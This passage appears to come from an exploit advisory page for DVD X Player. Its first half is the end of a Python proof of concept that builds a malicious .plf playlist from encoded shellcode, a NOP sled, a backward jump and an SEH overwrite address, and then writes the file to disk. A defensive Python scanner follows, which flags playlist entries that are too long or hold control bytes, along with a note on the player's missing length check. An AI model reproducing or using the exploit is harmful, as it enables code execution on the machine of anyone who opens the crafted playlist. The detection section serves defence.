shellcode += "\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
shellcode += "\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
shellcode += "\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
shellcode += "\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
shellcode += "\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
shellcode += "\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
shellcode += "\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
shellcode += "\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
shellcode += "\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
shellcode += "\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
shellcode += "\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
shellcode += "\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
shellcode += "\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
shellcode += "\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
shellcode += "\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
shellcode += "\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
shellcode += "\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
shellcode += "\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
shellcode += "\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
shellcode += "\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
shellcode += "\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
shellcode += "\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
shellcode += "\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
shellcode += "\x6b\xc2\x36"

junk = "\x90" * (600 -len(shellcode))
junk += shellcode

# nasm > jmp $-400
# 00000000  E96BFEFFFF        jmp 0xfffffe70
backflip="\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
junk += backflip

# 00401838  |. 5E             POP ESI
junk += "\xeb\xf6\x90\x90"
junk += "\x38\x18\x40\x1a"

file = open("evil_playlist.plf", "w")
file.write(junk)
file.close()
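Both DVD X Player PoCs on this page build a .plf playlist whose single entry is several hundred bytes of padding followed by SEH overwrite and shellcode, far longer than any file path. The following is an added triage example, not code from either advisory: it scans a playlist's lines and reports any that exceed a path-length ceiling or contain control bytes, which is enough to flag such a file before it is opened in a player. The 260-byte ceiling (MAX_PATH) is an assumption, and both sample playlists are constructed.

```python
"""Flag playlist entries that cannot be file paths."""
from __future__ import annotations

# Assumption: a playlist entry is a file path, so anything longer than
# MAX_PATH (260) or containing control bytes is not one.
MAX_ENTRY_LEN = 260

# Constructed samples: ordinary entries, and one line that is far too long
# and carries a control byte, which is the shape a crafted .plf takes.
BENIGN_PLF = b"C:\\Videos\\intro.avi\r\nC:\\Videos\\feature.avi\r\n"
SUSPECT_PLF = b"C:\\Videos\\intro.avi\r\n" + b"A" * 700 + b"\x06\x90" + b"\r\n"


def _is_control(byte: int) -> bool:
    """Control bytes other than TAB, plus DEL; bytes >= 0x80 are allowed
    because paths may legitimately contain non-ASCII characters."""
    return (byte < 0x20 and byte != 0x09) or byte == 0x7F


def scan_playlist(data: bytes, max_len: int = MAX_ENTRY_LEN) -> list[dict]:
    """One finding per suspicious line: line number, length, control-byte count."""
    findings = []
    for lineno, line in enumerate(data.splitlines(), start=1):
        controls = sum(1 for b in line if _is_control(b))
        if len(line) > max_len or controls:
            findings.append({"line": lineno, "length": len(line), "control_bytes": controls})
    return findings


def is_suspicious(data: bytes) -> bool:
    return bool(scan_playlist(data))
```

A check like this belongs in mail or download gateways that see playlist attachments, and the same length rule is the input validation the player itself lacked: a fixed-size stack buffer receiving an entry without a bound on its length.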